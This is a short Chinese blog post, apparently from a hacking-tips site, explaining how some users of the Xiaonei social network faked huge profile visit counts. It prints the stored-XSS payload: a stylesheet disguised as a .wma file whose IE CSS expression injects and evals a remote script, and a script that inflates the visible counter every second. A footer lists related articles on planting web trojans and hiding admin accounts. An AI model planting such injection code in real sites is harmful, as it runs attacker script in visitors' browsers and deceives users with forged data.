本来不想提校内网的XSS来着,因为太多,没有提的必要。
不过最近室友争着问我为什么有的人的空间访问量已经达到了几千万(在百度这里相对比较容易,因为文章的访问也算在内。而校内网的不算,所以几百万算是天文数字了),而且数字还在以每秒钟若干的数据增长!所以这里也给大家看下。
懂XSS的好友知道,这里便是利用上XSS了。看了看他们的代码(涂鸦板),大致如下:
| 以下是引用片段: <link href="A308676992321RAT.wma" type="text/css" rel="stylesheet" /> <div class=addJs>A247165747728HOR.wma</div> |
其中A308676992321RAT.wma里的代码如下:
| 以下是引用片段: .addJs{ display:none; background:expression((this.innerHTML!="")?(((this.innerHTML=unescape("jsfile=document.createElement%28%27script%27%29;jsfile.src=%27"+this.innerHTML+"%27;document.body.insertAdjacentElement%28%27BeforeBegin%27,jsfile%29;"))&&(eval(this.innerHTML))&&(this.innerHTML=""))==null?'red':'green'):'blue'); } |
A247165747728HOR.wma里的代码如下:
| 以下是引用片段: function ChangeVcount() { var mc=28; var mcc=parseInt(getEl('vcount').innerText); mc+=mcc; getEl('vcount').innerText=mc; setTimeout("ChangeVcount()", 1000); return true ; } ChangeVcount(); |
| 电信禁止ADSL路由器上网的破解方 | 07-04 | |
| 各种网页木马挂马的代码 | 07-04 | |
| 简单打造不死鸽子 | 07-02 | |
| 走进神秘的社会工程学 | 07-02 | |
| 建立系统中别人永远删不掉的管理 | 06-29 | |
| 入侵搜索关键字 | 06-19 | |
| phpwind、DZ论坛XSS跨站漏洞0DAY | 06-15 | |
| 如何提高提权效率 | 06-14 | |
| 隐藏管理员账号三分钟搞定 | 05-30 | |
| 5分钟激活Vista 免刷BIOS方法揭秘 | 05-18 | |
| 最新挂马的方法大全 | 05-17 | |
| 数据库下载漏洞 | 05-16 | |